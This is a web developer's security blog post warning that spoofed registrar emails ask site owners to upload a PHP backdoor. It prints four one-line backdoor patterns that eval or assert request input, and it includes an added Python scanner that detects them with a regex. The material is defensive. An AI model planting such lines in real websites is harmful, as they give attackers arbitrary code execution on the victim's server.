Security Blog

Do not trust those fake domain confirmation emails

If you ever receive a letter of any kind asking you to create, download or install some PHP code on your website, you must ignore it.


Recently some of my clients received strange emails from their domain registrars. Those letters asked them to confirm that they own their domains. I checked one of those letters and quickly identified it as fraudulent. All the letters follow an identical pattern: a request to create a PHP file with a specific name and the given content in the root folder of the website. Needless to say, the suggested content for that PHP file is malicious code known as a backdoor. This kind of code allows the attacker to execute any action they want on a victim’s website.

If you ever receive a letter of any kind asking you to create, download or install some PHP code on your website, you must ignore it. No exceptions. Even if the letter comes from the president or your mom.

Fraudulent letters appear legitimate because they carry a legitimate From email address. But this is email spoofing. You don’t expect to receive a fake email from your friends or your domain registrar, right? No! Any email can carry any From address. The vast majority of email servers and email clients do not check or verify the sender address. So you see what the attacker wanted you to see. You must not trust any email, even one from a known sender, if it asks for a suspicious action such as installing code on your website or an application on your computer.

Technical details

Fake emails usually contain some of the following PHP lines.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval and assert are well-known markers of suspicious or malicious PHP code.
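A webroot check for the lines listed above, added here as an example and not part of the original post: it flags eval or assert calls whose argument comes from a request variable, directly or through wrappers such as stripslashes or base64_decode. The function names, the sample files and the extra request variables ($_GET, $_POST, $_COOKIE) are assumptions of this example.

```python
import os
import re
import tempfile

# Sink (eval/assert, case-insensitive as in PHP) fed by a request superglobal,
# optionally through wrapper calls, matching the lines shown in the post.
# $_GET/$_POST/$_COOKIE are an assumption; the post only shows $_REQUEST.
PATTERN = re.compile(
    r"\b((?i:eval|assert))\s*\(\s*((?:@?\w+\s*\(\s*)*)\$_(REQUEST|GET|POST|COOKIE)\b"
)

def scan_php_source(text):
    """Return (line_number, sink, wrappers, source) for every match in text."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for m in PATTERN.finditer(line):
            wrappers = re.findall(r"\w+", m.group(2))
            findings.append((number, m.group(1).lower(), wrappers, "$_" + m.group(3)))
    return findings

def scan_webroot(root):
    """Walk root and scan every .php file; returns {path: findings}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = scan_php_source(handle.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples: one file holding a line from the post, one benign form.
SAMPLE_BAD = "<?php\neval(base64_decode($_REQUEST['something']));\n"
SAMPLE_OK = "<?php\n$name = stripslashes($_POST['name']);\necho htmlspecialchars($name);\n"

def demo():
    """Write both samples to a temporary webroot and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("confirm.php", SAMPLE_BAD), ("form.php", SAMPLE_OK)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as handle:
                handle.write(body)
        return {os.path.basename(p): h for p, h in scan_webroot(root).items()}

if __name__ == "__main__":
    print(demo())
```

A hit is a reason to inspect the file by hand; the pattern works line by line, so it will miss obfuscated or multi-line variants.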

See also: Plugin Inspector reveals security issues with other plugins

I’m a self-employed developer who has been building software products and services using WordPress for more than seven years. I enjoy partnering with others on interesting and challenging projects. If you’re interested, feel free to contact me.
